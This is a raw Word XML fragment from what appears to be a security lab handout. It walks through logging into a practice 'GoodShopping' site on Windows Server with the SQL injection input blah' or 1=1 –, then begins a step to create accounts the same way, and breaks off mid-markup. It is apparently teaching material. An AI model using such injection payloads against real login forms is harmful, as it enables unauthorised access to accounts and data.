        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>programmers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BABD933" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB855B1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="839"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Overall, this attack could compromise the sensitive information within an organisation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBC2AD0" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C33A4A" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:left="1559" w:right="1436"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Blind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Injection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Similar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Injection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>As</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>says</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Blind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQL injection, the results of the injection is not visible to the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A002B8" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login to Win Servers 2016 and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2012</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529544E1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Win Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2016</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43804521" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MS SQL Server Tools 17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQL Server Mgt Studio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE8D137" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Select Windows Authentication and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AEF6BC" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Object Explorer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Databases </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>GoodShopping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:spacing w:val="18"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dbo.login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133C5647" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Select Top 1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC69C51" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>You should see the user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A677D95" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F4992C6" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Win Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2012:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34908102" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>http://www.goodshoppin</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>g.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26B203B8" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16456318" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:ind w:right="1435"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>page,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>blah’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>without any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF73A80" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Did you manage to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>login?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8C35D6" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>You should!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA3DF7" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2279"/>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Browse and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>logout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392803DF" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Close the web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F29655E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:right="1436"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Now, using this vulnerability, we shall try to create a user account with SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02229B72" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>http://www.goodshopping.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="04B22528" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4148209D" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
